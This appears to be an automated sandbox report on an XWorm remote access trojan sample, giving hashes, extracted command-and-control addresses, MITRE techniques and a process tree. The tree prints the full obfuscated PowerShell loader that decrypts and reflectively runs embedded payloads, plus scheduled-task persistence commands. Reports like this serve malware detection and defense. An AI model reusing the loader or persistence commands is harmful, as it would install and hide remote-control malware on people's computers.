xworm | 5a1bc7923a04c38975120facb005961068ea9b81cdcbecf7595c9cbcb73dda68

Analysis

max time kernel
27s
max time network
17s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
12/09/2024, 08:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CosmeticLoader.bat
Size

462KB
MD5

d44126df70e3dbdff887215a95e6f3ce
SHA1

6d729305d24b9ede2bef06b7885c4348e1899287
SHA256

5a1bc7923a04c38975120facb005961068ea9b81cdcbecf7595c9cbcb73dda68
SHA512

cd63b04365d8edf905ce2cea4a3c205761d65c0feef67b8840bbc87078d8739ecf735449e8cffdcae48e5f45895f62860dff6acee1da7e8701ded067f0527daf
SSDEEP

12288:+vhOfI50mwS2DU3R2ytr9vOH7OCGrGa4c:+vj97IAm7orkc

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:7000

80.76.49.176:7000

Attributes

Install_directory
%AppData%
install_file
XClient.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3928-169-0x00000200C3250000-0x00000200C3272000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4016	powershell.exe
2688	powershell.exe
3928	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4476	XClient.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\XClient	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
776	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4016	powershell.exe
4016	powershell.exe
4016	powershell.exe
2688	powershell.exe
2688	powershell.exe
2688	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3112	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeIncreaseQuotaPrivilege	2688	powershell.exe
Token: SeSecurityPrivilege	2688	powershell.exe
Token: SeTakeOwnershipPrivilege	2688	powershell.exe
Token: SeLoadDriverPrivilege	2688	powershell.exe
Token: SeSystemProfilePrivilege	2688	powershell.exe
Token: SeSystemtimePrivilege	2688	powershell.exe
Token: SeProfSingleProcessPrivilege	2688	powershell.exe
Token: SeIncBasePriorityPrivilege	2688	powershell.exe
Token: SeCreatePagefilePrivilege	2688	powershell.exe
Token: SeBackupPrivilege	2688	powershell.exe
Token: SeRestorePrivilege	2688	powershell.exe
Token: SeShutdownPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeSystemEnvironmentPrivilege	2688	powershell.exe
Token: SeRemoteShutdownPrivilege	2688	powershell.exe
Token: SeUndockPrivilege	2688	powershell.exe
Token: SeManageVolumePrivilege	2688	powershell.exe
Token: 33	2688	powershell.exe
Token: 34	2688	powershell.exe
Token: 35	2688	powershell.exe
Token: 36	2688	powershell.exe
Token: SeIncreaseQuotaPrivilege	2688	powershell.exe
Token: SeSecurityPrivilege	2688	powershell.exe
Token: SeTakeOwnershipPrivilege	2688	powershell.exe
Token: SeLoadDriverPrivilege	2688	powershell.exe
Token: SeSystemProfilePrivilege	2688	powershell.exe
Token: SeSystemtimePrivilege	2688	powershell.exe
Token: SeProfSingleProcessPrivilege	2688	powershell.exe
Token: SeIncBasePriorityPrivilege	2688	powershell.exe
Token: SeCreatePagefilePrivilege	2688	powershell.exe
Token: SeBackupPrivilege	2688	powershell.exe
Token: SeRestorePrivilege	2688	powershell.exe
Token: SeShutdownPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeSystemEnvironmentPrivilege	2688	powershell.exe
Token: SeRemoteShutdownPrivilege	2688	powershell.exe
Token: SeUndockPrivilege	2688	powershell.exe
Token: SeManageVolumePrivilege	2688	powershell.exe
Token: 33	2688	powershell.exe
Token: 34	2688	powershell.exe
Token: 35	2688	powershell.exe
Token: 36	2688	powershell.exe
Token: SeIncreaseQuotaPrivilege	2688	powershell.exe
Token: SeSecurityPrivilege	2688	powershell.exe
Token: SeTakeOwnershipPrivilege	2688	powershell.exe
Token: SeLoadDriverPrivilege	2688	powershell.exe
Token: SeSystemProfilePrivilege	2688	powershell.exe
Token: SeSystemtimePrivilege	2688	powershell.exe
Token: SeProfSingleProcessPrivilege	2688	powershell.exe
Token: SeIncBasePriorityPrivilege	2688	powershell.exe
Token: SeCreatePagefilePrivilege	2688	powershell.exe
Token: SeBackupPrivilege	2688	powershell.exe
Token: SeRestorePrivilege	2688	powershell.exe
Token: SeShutdownPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeSystemEnvironmentPrivilege	2688	powershell.exe
Token: SeRemoteShutdownPrivilege	2688	powershell.exe
Token: SeUndockPrivilege	2688	powershell.exe
Token: SeManageVolumePrivilege	2688	powershell.exe
Token: 33	2688	powershell.exe
Token: 34	2688	powershell.exe
Token: 35	2688	powershell.exe

Suspicious use of WriteProcessMemory 62 IoCs

description	pid	Process	procid_target
PID 5012 wrote to memory of 3684	5012	cmd.exe	75
PID 5012 wrote to memory of 3684	5012	cmd.exe	75
PID 5012 wrote to memory of 4016	5012	cmd.exe	76
PID 5012 wrote to memory of 4016	5012	cmd.exe	76
PID 4016 wrote to memory of 2688	4016	powershell.exe	77
PID 4016 wrote to memory of 2688	4016	powershell.exe	77
PID 4016 wrote to memory of 520	4016	powershell.exe	80
PID 4016 wrote to memory of 520	4016	powershell.exe	80
PID 520 wrote to memory of 3516	520	WScript.exe	81
PID 520 wrote to memory of 3516	520	WScript.exe	81
PID 3516 wrote to memory of 4212	3516	cmd.exe	83
PID 3516 wrote to memory of 4212	3516	cmd.exe	83
PID 3516 wrote to memory of 3928	3516	cmd.exe	84
PID 3516 wrote to memory of 3928	3516	cmd.exe	84
PID 3928 wrote to memory of 3112	3928	powershell.exe	54
PID 3928 wrote to memory of 2556	3928	powershell.exe	45
PID 3928 wrote to memory of 2356	3928	powershell.exe	66
PID 3928 wrote to memory of 1960	3928	powershell.exe	37
PID 3928 wrote to memory of 384	3928	powershell.exe	15
PID 3928 wrote to memory of 1760	3928	powershell.exe	35
PID 3928 wrote to memory of 2544	3928	powershell.exe	44
PID 3928 wrote to memory of 1556	3928	powershell.exe	29
PID 3928 wrote to memory of 1752	3928	powershell.exe	34
PID 3928 wrote to memory of 1352	3928	powershell.exe	26
PID 3928 wrote to memory of 1548	3928	powershell.exe	39
PID 3928 wrote to memory of 2720	3928	powershell.exe	50
PID 3928 wrote to memory of 748	3928	powershell.exe	10
PID 3928 wrote to memory of 2912	3928	powershell.exe	53
PID 3928 wrote to memory of 1728	3928	powershell.exe	33
PID 3928 wrote to memory of 1328	3928	powershell.exe	25
PID 3928 wrote to memory of 2700	3928	powershell.exe	49
PID 3928 wrote to memory of 1320	3928	powershell.exe	24
PID 3928 wrote to memory of 1512	3928	powershell.exe	28
PID 3928 wrote to memory of 1116	3928	powershell.exe	21
PID 3928 wrote to memory of 916	3928	powershell.exe	13
PID 3928 wrote to memory of 1896	3928	powershell.exe	36
PID 3928 wrote to memory of 1060	3928	powershell.exe	19
PID 3928 wrote to memory of 2680	3928	powershell.exe	48
PID 3928 wrote to memory of 2876	3928	powershell.exe	52
PID 3928 wrote to memory of 704	3928	powershell.exe	16
PID 3928 wrote to memory of 4820	3928	powershell.exe	61
PID 3928 wrote to memory of 876	3928	powershell.exe	12
PID 3928 wrote to memory of 1068	3928	powershell.exe	20
PID 3928 wrote to memory of 2636	3928	powershell.exe	46
PID 3928 wrote to memory of 4596	3928	powershell.exe	63
PID 3928 wrote to memory of 1048	3928	powershell.exe	18
PID 3928 wrote to memory of 1240	3928	powershell.exe	23
PID 3928 wrote to memory of 1628	3928	powershell.exe	31
PID 3928 wrote to memory of 1680	3928	powershell.exe	32
PID 3928 wrote to memory of 1212	3928	powershell.exe	22
PID 3928 wrote to memory of 816	3928	powershell.exe	11
PID 3928 wrote to memory of 1404	3928	powershell.exe	27
PID 3928 wrote to memory of 1600	3928	powershell.exe	30
PID 3928 wrote to memory of 4948	3928	powershell.exe	64
PID 3928 wrote to memory of 2188	3928	powershell.exe	40
PID 3928 wrote to memory of 2372	3928	powershell.exe	41
PID 3928 wrote to memory of 596	3928	powershell.exe	17
PID 3928 wrote to memory of 2748	3928	powershell.exe	51
PID 3928 wrote to memory of 776	3928	powershell.exe	85
PID 3928 wrote to memory of 776	3928	powershell.exe	85
PID 1068 wrote to memory of 4476	1068	svchost.exe	87
PID 1068 wrote to memory of 4476	1068	svchost.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
PID:816

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
1⤵
PID:876

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:916

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:384

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:704

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:596

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1⤵
PID:1060

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1068
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  - Executes dropped EXE
  PID:4476

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1116

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1240

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1328

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1352

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1404

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1512

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1556

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1600

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1680

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1760

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1896

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1960

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1548

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2188

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2372

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2544

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2556

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2636

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2680

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2700

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2720

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:2876

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2912

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CosmeticLoader.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twkRdSS9rx0e1GAS+xOYGpTEHiXnefOd1aQP1MfgoFw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iv04Ns0kPKLIVTUZA6Q2SQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Zxwkp=New-Object System.IO.MemoryStream(,$param_var); $JOKcw=New-Object System.IO.MemoryStream; $vznpW=New-Object System.IO.Compression.GZipStream($Zxwkp, [IO.Compression.CompressionMode]::Decompress); $vznpW.CopyTo($JOKcw); $vznpW.Dispose(); $Zxwkp.Dispose(); $JOKcw.Dispose(); $JOKcw.ToArray();}function execute_function($param_var,$param2_var){ $Ekltt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uOQTi=$Ekltt.EntryPoint; $uOQTi.Invoke($null, $param2_var);}$oFsgC = 'C:\Users\Admin\AppData\Local\Temp\CosmeticLoader.bat';$host.UI.RawUI.WindowTitle = $oFsgC;$emRHs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oFsgC).Split([Environment]::NewLine);foreach ($hVxGX in $emRHs) { if ($hVxGX.StartsWith('apqHOrrBYoUaaAYCNYVK')) { $TkgLL=$hVxGX.Substring(20); break; }}$payloads_var=[string[]]$TkgLL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:3684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_323_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2688
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:520
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3516
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twkRdSS9rx0e1GAS+xOYGpTEHiXnefOd1aQP1MfgoFw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iv04Ns0kPKLIVTUZA6Q2SQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Zxwkp=New-Object System.IO.MemoryStream(,$param_var); $JOKcw=New-Object System.IO.MemoryStream; $vznpW=New-Object System.IO.Compression.GZipStream($Zxwkp, [IO.Compression.CompressionMode]::Decompress); $vznpW.CopyTo($JOKcw); $vznpW.Dispose(); $Zxwkp.Dispose(); $JOKcw.Dispose(); $JOKcw.ToArray();}function execute_function($param_var,$param2_var){ $Ekltt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uOQTi=$Ekltt.EntryPoint; $uOQTi.Invoke($null, $param2_var);}$oFsgC = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.bat';$host.UI.RawUI.WindowTitle = $oFsgC;$emRHs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oFsgC).Split([Environment]::NewLine);foreach ($hVxGX in $emRHs) { if ($hVxGX.StartsWith('apqHOrrBYoUaaAYCNYVK')) { $TkgLL=$hVxGX.Substring(20); break; }}$payloads_var=[string[]]$TkgLL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:4212
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3928
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:776

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4820

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:4948

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:2356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
50KB

MD5
2143b379fed61ab5450bab1a751798ce

SHA1
32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

SHA256
a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

SHA512
0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
aeb24b5729d62e81a27174f46d431126

SHA1
baa02ac3f99822d1915bac666450dc20727494bb

SHA256
d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471

SHA512
e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uw1phdwj.5rs.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.bat

Filesize
462KB

MD5
d44126df70e3dbdff887215a95e6f3ce

SHA1
6d729305d24b9ede2bef06b7885c4348e1899287

SHA256
5a1bc7923a04c38975120facb005961068ea9b81cdcbecf7595c9cbcb73dda68

SHA512
cd63b04365d8edf905ce2cea4a3c205761d65c0feef67b8840bbc87078d8739ecf735449e8cffdcae48e5f45895f62860dff6acee1da7e8701ded067f0527daf

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.vbs

Filesize
124B

MD5
f7de4b9f14c10d5abaa492c2c3df7232

SHA1
b4ecb2a31cfda13694563e47afdbd0352f01d51c

SHA256
b019b61f2bd0c425e83c1431e670e1cef0c87a703fdcd04f1a6eea9378f9c8cb

SHA512
1bbdc6505ae290437de19afc063dbbb45e85a99ecefae1f3d702e94c7ff4da67d3d4a5cb3b2910228b465bf0eca90a33f212c0ba88b8893b4a1b2a71b913027c

Download Submit
C:\Users\Admin\AppData\Roaming\XClient.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
memory/596-236-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/748-227-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/916-229-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/1048-237-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/1060-233-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/1068-232-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/1116-228-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/1240-234-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/1512-222-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/1556-219-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/1600-223-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/1628-226-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/1896-231-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/1960-230-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/2356-221-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/2556-220-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/2636-224-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/2688-104-0x00007FFD1CD30000-0x00007FFD1D71C000-memory.dmp

Filesize
9.9MB

Download
memory/2688-74-0x00007FFD1CD30000-0x00007FFD1D71C000-memory.dmp

Filesize
9.9MB

Download
memory/2688-71-0x00007FFD1CD30000-0x00007FFD1D71C000-memory.dmp

Filesize
9.9MB

Download
memory/2688-70-0x00007FFD1CD30000-0x00007FFD1D71C000-memory.dmp

Filesize
9.9MB

Download
memory/2700-238-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/3112-218-0x00007FFCF88C0000-0x00007FFCF88D0000-memory.dmp

Filesize
64KB

Download
memory/3112-172-0x0000000002910000-0x000000000293A000-memory.dmp

Filesize
168KB

Download
memory/3928-169-0x00000200C3250000-0x00000200C3272000-memory.dmp

Filesize
136KB

Download
memory/4016-58-0x000001EE9BF90000-0x000001EE9BFE8000-memory.dmp

Filesize
352KB

Download
memory/4016-0-0x00007FFD1CD33000-0x00007FFD1CD34000-memory.dmp

Filesize
4KB

Download
memory/4016-57-0x000001EE9BC10000-0x000001EE9BC18000-memory.dmp

Filesize
32KB

Download
memory/4016-56-0x00007FFD1CD30000-0x00007FFD1D71C000-memory.dmp

Filesize
9.9MB

Download
memory/4016-47-0x000001EE9BF10000-0x000001EE9BF86000-memory.dmp

